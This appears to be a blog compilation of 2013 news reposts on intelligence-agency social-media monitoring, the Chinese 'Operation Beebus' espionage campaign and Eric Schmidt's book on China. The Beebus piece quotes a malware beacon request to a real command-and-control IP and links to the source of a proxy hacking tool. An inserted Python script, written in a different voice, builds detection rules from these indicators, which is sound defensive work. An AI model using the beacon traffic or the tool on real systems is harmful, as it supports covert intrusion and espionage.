Tuesday, February 12, 2013

CyBERWARZONE: CIA admits Full Monitoring of Facebook and other Social Networks

OPEN SOURCE
US/1; ATTN US/12; HST/2; TJ/2

Most people use social media like Facebook and Twitter to share photos of friends and family, chat with friends and strangers about random and amusing diversions, or follow their favorite websites, bands and television shows.

But what does the US military use those same networks for? Well, we can't tell you: That's "classified," a CENTCOM spokesman recently informed Raw Story.

One use that's confirmed, however, is the manipulation of social media through fake online "personas" managed by the military. Recently the US Air Force solicited private sector vendors for something called "persona management software." Such a technology would allow a single individual to command virtual armies of fake, digital "people" across numerous social media portals.

These "personas" were to have detailed, fictionalized backgrounds, to make them believable to outside observers, and a sophisticated identity protection service was to back them up, preventing suspicious readers from uncovering the real person behind the account. They even worked out ways to game geolocating services, so these "personas" could be virtually inserted anywhere in the world, providing ostensibly live commentary on real events, even while the operator was not really present.
When Raw Story first reported on the contract for this software, it was unclear what the Air Force wanted with it or even if it had been acquired. The potential for misuse, however, was abundantly clear.

A fake virtual army of people could be used to help create the impression of consensus opinion in online comment threads, or manipulate social media to the point where valuable stories are suppressed.

Ultimately, this can have the effect of causing a net change to the public's opinions and understanding of key world events.

Wired.com published an article on how US spies, through the investment firm In-Q-Tel, are putting money into a company that monitors your blogs and reads your tweets.

In-Q-Tel, the investment arm of the CIA and the wider intelligence community, is putting cash into Visible Technologies, a software firm that specializes in monitoring social media. It's part of a larger movement within the spy services to get better at using "open source intelligence" - information that's publicly available, but often hidden in the flood of TV shows, newspaper articles, blog posts, online videos and radio reports generated every day.

Visible crawls over half a million web 2.0 sites a day, scraping more than a million posts and conversations taking place on blogs, online forums, Flickr, YouTube, Twitter and Amazon. (It doesn't touch closed social networks, like Facebook, at the moment.) Customers get customized, real-time feeds of what's being said on these sites, based on a series of keywords.

"That's kind of the basic step - get in and monitor," says company senior vice president Blake Cahill.

Then Visible "scores" each post, labeling it as positive or negative, mixed or neutral. It examines how influential a conversation or an author is. ("Trying to determine who really matters," as Cahill puts it.) Finally, Visible gives users a chance to tag posts, forward them to colleagues and respond through a web interface.
In-Q-Tel says it wants Visible to keep track of foreign social media, and give spooks "early-warning detection on how issues are playing internationally," spokesperson Donald Tighe tells Danger Room.

Of course, such a tool can also be pointed inward, at domestic bloggers or tweeters. Visible already keeps tabs on web 2.0 sites for Dell, AT&T and Verizon. For Microsoft, the company is monitoring the buzz on its Windows 7 rollout. For Spam-maker Hormel, Visible is tracking animal-rights activists' online campaigns against the company.

"Anything that is out in the open is fair game for collection," says Steven Aftergood, who tracks intelligence issues at the Federation of American Scientists. But "even if information is openly gathered by intelligence agencies it would still be problematic if it were used for unauthorized domestic investigations or operations. Intelligence agencies or employees might be tempted to use the tools at their disposal to compile information on political figures, critics, journalists or others, and to exploit such information for political advantage. That is not permissible even if all of the information in question is technically 'open source.'"

Visible chief executive officer Dan Vetras says the CIA is now an "end customer," thanks to the In-Q-Tel investment. And more government clients are now on the horizon. "We just got awarded another one in the last few days," Vetras adds.
Tighe disputes this - sort of. "This contract, this deal, this investment has nothing to do with any agency of government and this company," he says. But Tighe quickly notes that In-Q-Tel does have "an interested end customer" in the intelligence community for Visible. And if all goes well, the company's software will be used in pilot programs at that agency. "In pilots, we use real data. And during the adoption phase, we use it in real missions."

Neither party would disclose the size of In-Q-Tel's investment in Visible, a 90-person company with expected revenues of about $20 million in 2010. But a source familiar with the deal says the In-Q-Tel cash will be used to boost Visible's foreign languages capabilities, which already include Arabic, French, Spanish and nine other languages.

Visible has been trying for nearly a year to break into the government field. In late 2008, the company teamed up with the Washington, DC, consulting firm Concepts & Strategies, which has handled media monitoring and translation services for U.S. Strategic Command and the Joint Chiefs of Staff, among others. On its website, Concepts & Strategies is recruiting "social media engagement specialists" with Defense Department experience and a high proficiency in Arabic, Farsi, French, Urdu or Russian. The company is also looking for an "information system security engineer" who already has a "Top Secret SCI [Sensitive Compartmented Information] with NSA Full Scope Polygraph" security clearance.

The intelligence community has been interested in social media for years. In-Q-Tel has sunk money into companies like Attensity, which recently announced its own web 2.0-monitoring service. The agencies have their own, password-protected blogs and wikis - even a MySpace for spooks. The Office of the Director of National Intelligence maintains an Open Source Center, which combs publicly available information, including web 2.0 sites. Doug Naquin, the Center's Director, told an audience of intelligence professionals in October 2007 that "we're looking now at YouTube, which carries some unique and honest-to-goodness intelligence.... We have groups looking at what they call 'citizens media': people taking pictures with their cell phones and posting them on the internet. Then there's social media, phenomena like MySpace and blogs."

But, "the CIA specifically needs the help of innovative tech firms to keep up with the pace of innovation in social media. Experienced IC [intelligence community] analysts may not be the best at detecting the incessant shift in popularity of social-networking sites. They need help in following young international internet user-herds as they move their allegiance from one site to another," Lewis Shepherd, the former senior technology officer at the Defense Intelligence Agency, says in an e-mail. "Facebook says that more than 70 percent of its users are outside the U.S., in more than 180 countries. There are more than 200 non-U.S., non-English-language microblogging Twitter-clone sites today. If the intelligence community ignored that tsunami of real-time information, we'd call them incompetent."


Thursday, February 7, 2013

Pierluigi Paganini - Operation Beebus, another chinese cyber espionage campaign

OPEN SOURCE
US/1; ATTN US/12; HST/2; TJ/2

by paganinip on February 7th, 2013
 
Security firm FireEye has revealed an APT campaign, originating from China, that targets companies in the defense and aerospace sector in order to steal intellectual property and industrial secrets from US companies.

In this period many other attacks have been linked to China, such as the cyber espionage campaigns against the NYT and the Washington Post. This time the hackers demonstrated particular interest in the design of Unmanned Aerial Vehicles (UAVs) and other robotic aircraft.

FireEye named the latest campaign "Operation Beebus" after an early sample from the campaign (MD5: 7ed557921ac60dfcb295ebabfd972301), which was first submitted to VirusTotal on April 12, 2011.

The attack scheme is basic spear phishing: the attackers use both email and drive-by downloads against targeted victims, exploiting common vulnerabilities in PDF and DOC files to install a Trojan backdoor.

Last March FireEye registered suspicious activity against its clients in the aerospace and defense sector: continuous waves of attacks repeated over time.
The principal evidence pointing to China is the many similarities with past attacks linked to Beijing, notably the reuse of command and control (C&C) infrastructure connected to the 2011 APT attack on RSA's SecurID token system. The researchers observed the following "Beebus" traffic pattern:

GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 68.96.31.136
The IP address 68.96.31.136 was another C2 node reported by Dell SecureWorks as hosting HTran proxy infrastructure. Dell's security team attributed the tool to Chinese authors and dated its creation back to 2003; the Dell SecureWorks post on the tool states:
“HTran (aka HUC Packet Transmit Tool) is a rudimentary connection bouncer, designed to redirect TCP traffic destined for one host to an alternate host. The source code copyright notice indicates that HTran was authored by “lion”, a well-known Chinese hacker and member of “HUC”, the Honker Union of China. The purpose of this type of tool is to disguise either the true source or destination of Internet traffic in the course of hacking activity.
Source code can be readily found on the Internet:
http://read.pudn.com/downloads199/sourcecode/windows/935255/htran.cpp__.htm
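The request above is the kind of thing a defender turns into a detection. The following is an added example, not code from FireEye, Dell SecureWorks or the article: it scores proxy log lines against three indicators visible in the quoted request (the C2 IP 68.96.31.136, the "/s/asp?" path carrying an opaque base64url-looking payload, and a User-Agent whose "compatible;" token names no browser or OS). The log layout, the client IPs, the second beacon host 203.0.113.9 and all non-Beebus lines are constructed for the example; the assumption that the payload rotates per beacon, so the detection keys on its shape rather than the exact string, is mine.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Indicators taken from the Beebus request quoted in the article: the C2 IP,
# the "/s/asp?" path with an opaque base64url-looking payload, and a
# User-Agent whose "compatible;" token carries no browser or OS name at all.
KNOWN_C2_HOSTS = {"68.96.31.136"}
# Assumption: the payload changes per beacon, so match its shape, not its value.
BEEBUS_PATH = re.compile(r"^/s/asp\?[A-Za-z0-9_\-]{32,}=*(?:p=\d+)?$")
EMPTY_COMPATIBLE_UA = "Mozilla/4.0 (compatible; )"
DOTTED_QUAD = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Assumed proxy log layout, constructed for this example (not a real product format):
#   <timestamp> <client-ip> <method> <host> <path> <status> "<user-agent>"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class Alert:
    client: str
    host: str
    reasons: Tuple[str, ...]


def score_request(client: str, method: str, host: str, path: str, ua: str) -> Optional[Alert]:
    """Apply the Beebus indicators to one request; None means nothing matched."""
    reasons = []
    if host in KNOWN_C2_HOSTS:
        reasons.append("known-c2-host")
    path_hit = method == "GET" and BEEBUS_PATH.match(path) is not None
    if path_hit:
        reasons.append("beebus-path-pattern")
    if ua == EMPTY_COMPATIBLE_UA:
        reasons.append("empty-compatible-ua")
    # Browsers rarely GET an opaque blob from a bare IP; this catches the same
    # beacon shape on C2 nodes that are not yet on the block list.
    if path_hit and DOTTED_QUAD.match(host):
        reasons.append("ip-host-with-opaque-payload")
    return Alert(client, host, tuple(reasons)) if reasons else None


def score_line(line: str) -> Optional[Alert]:
    """Parse one proxy log line and score it; unparseable lines are ignored."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    return score_request(m["client"], m["method"], m["host"], m["path"], m["ua"])


def request_from_raw(raw: str) -> Tuple[str, str, str, str]:
    """Split a raw HTTP request (as printed in the article) into (method, host, path, ua)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers.get("host", ""), path, headers.get("user-agent", "")


def scan(lines):
    """Return the alerts for every line of a log, in order."""
    return [a for a in map(score_line, lines) if a is not None]


# The request quoted in the article, verbatim.
BEEBUS_SAMPLE = """GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 68.96.31.136
"""

# Constructed log lines: the sample beacon, ordinary browsing, the same beacon
# shape against an IP not on the list, and a legitimate IE-style User-Agent.
SAMPLE_LOG = [
    '2013-02-05T09:14:02Z 10.1.4.22 GET 68.96.31.136 '
    '/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 '
    '200 "Mozilla/4.0 (compatible; )"',
    '2013-02-05T09:14:05Z 10.1.4.23 GET www.example.com /news/index.html 200 '
    '"Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0"',
    '2013-02-05T09:14:09Z 10.1.4.22 GET 203.0.113.9 '
    '/s/asp?QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB=p=2 200 "Mozilla/4.0 (compatible; )"',
    '2013-02-05T09:14:11Z 10.1.4.24 GET 192.0.2.7 /update/check.php?v=3 200 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"',
]

if __name__ == "__main__":
    print(score_request("n/a", *request_from_raw(BEEBUS_SAMPLE)))
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The known-IP match is the weakest of the four reasons, since C2 nodes rotate; the path shape and the empty "compatible;" User-Agent survive an infrastructure change, which is why the third sample line, aimed at an unlisted host, still raises an alert.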
FireEye recorded 261 separate attacks on its clients in 2012, 123 of which were on UAV or UAS (Unmanned Aerial Systems) vendors.

In total the C&C infrastructure had reached 214 servers with 60 unique IP addresses, a large investment of time and effort.

The attackers identified by FireEye used the same techniques and tools as the RSA attack. According to McAfee, one of the major tools used by these hackers was obfuscated or encrypted HTML comments embedded in otherwise benign websites, used to indirectly control compromised endpoints.
“Obfuscated/encrypted HTML comments has been also widely reported in the media as associated with the nation state group called “Comment Group” or “Comment Team,” which is believed to be associated with the Chinese government.“

Darien Kindlund, senior staff scientist at FireEye declared:
“We have enough evidence that points heavily in that direction” “We knew this was being done on behalf of a nation state,” “we believe the attack was largely successful.”
It is clear that dealing with the phenomenon of cyber espionage requires a structured approach: the threat has grown in complexity in recent years, and in many cases the attackers were able to evade the main security mechanisms for long periods.
A new model of dynamic defense must therefore be devised, but it cannot be separated from a higher level of user awareness, since in the majority of cases the exposure is caused by wrong human behavior.

You must know the threat to mitigate it.

Pierluigi Paganini

Sunday, February 3, 2013

WSJ-CI - Exclusive: Eric Schmidt Unloads on China in New Book

OPEN SOURCE
US/1; ATTN 


Google executive chairman Eric Schmidt is brutally clear: China is the most dangerous superpower on Earth.

Corporate Intelligence reviewed preliminary galleys of Schmidt’s new book, “The New Digital Age,” (Random House) which debuts in April. And Schmidt’s views on China stand out the strongest amid often predictable techno-utopian views of the future.

Some of these views are both cliched and camera-ready. He imagines that soon an "illiterate Maasai cattle herder in the Serengeti" will use a smartphone to "inquire the day's market prices and crowd-source the whereabouts of any nearby predators."

Other parts of the book are a much darker take on how authoritarians, extremists and rogues of all varieties are becoming just as empowered as that Maasai herdsman. And the good guys, whoever they are, have yet to work out how to properly defend themselves.

The new book is co-written by Jared Cohen, a 31-year old former State Department big shot who now runs Google Ideas, the search giant’s think tank.
The Schmidt and Cohen partnership has at least one other impressive credit to its name. The two wrote a long essay,“The Digital Disruption,” published in November 2010. In its opening paragraph, it predicted that “governments will be caught off-guard when large numbers of their citizens, armed with virtually nothing but cell phones, take part in mini-rebellions that challenge their authority.”

A month later, a wave of popular uprisings began across the Arab world. As the Egyptian revolution kicked off in January 2011, Cohen, so the story goes, was not only in Cairo: he shared dinner with Google executive and high-profile activist Wael Ghonim just hours before he was snatched from the streets by security forces.

With the Arab uprisings rolling onward, “The New Digital Age” picks up where that previous essay left off, taking a big-picture view on how everything from individual identities to corporate strategy, terrorism and statecraft will change as information seeps ever deeper. And in this all-Internet world, China, the book says again and again, is a dangerous and menacing superpower.

China, Schmidt and Cohen write, is “the world’s most active and enthusiastic filterer of information” as well as “the most sophisticated and prolific” hacker of foreign companies. In a world that is becoming increasingly digital, the willingness of China’s government and state companies to use cyber crime gives the country an economic and political edge, they say.

“The disparity between American and Chinese firms and their tactics will put both the government and the companies of the United States at a distinct disadvantage,” because “the United States will not take the same path of digital corporate espionage, as its laws are much stricter (and better enforced) and because illicit competition violates the American sense of fair play,” they claim.
“This is a difference in values as much as a legal one.”

The U.S. is far from an angel, the book acknowledges. From high-profile cases of cyber-espionage such as the Stuxnet virus that targeted Iranian nuclear facilities, to exports of surveillance software and technology to states with bad human rights records, there is plenty at home to criticize.

And those criticisms will become louder and more politically resonant, Schmidt and Cohen claim, as the distinctions between states that support freedom online and those that suppress it become clearer. The pair even speculate that the Internet could eventually fracture into pieces, some controlled by an alliance of states that are relatively tolerant and free, and others by groupings that want their citizens to take part in a less rowdy and open online life. Companies doing business with the latter could find themselves shunned from the former, the book suggests.

In this roundabout way the pair come close, on occasion, to suggesting western governments follow China’s lead and form closer relationships between state policy and corporate activity.

Take the equipment and software that comprises the Internet. Most of the world’s IT systems were once based almost entirely on Western infrastructure, but as Chinese firms get more competitive, that is changing, and not necessarily for the better, they say:
In the future superpower supplier nations will look to create their spheres of online influence around specific protocols and products, so that their technologies form the backbone of a particular society and their client states come to rely on certain critical infrastructure that the superpower alone builds, services and controls.
Chinese telecom equipment companies, rapidly gaining market share around the world, are at the front lines of the expansion of this sphere of influence, they say: “Where Huawei gains market share, the influence and reach of China grow as well”. And while western vendors like Cisco Systems and Ericsson are not state controlled, they will likely become closer to their governments in the future, Schmidt and Cohen say:
There will come a time when their commercial and national interests align and contrast with China — say, over the abuse of their products by an authoritarian state — and they will coordinate their efforts with their governments on both diplomatic and technical levels.
But for all the advantages China gains from its approach to the Internet, Schmidt and Cohen still seem to think its hollow political center is unsustainable. “This mix of active citizens armed with technological devices and tight government control is exceptionally volatile,” they write, warning this could lead to “widespread instability.”
In the longer run, China will see “some kind of revolution in the coming decades,” they write.


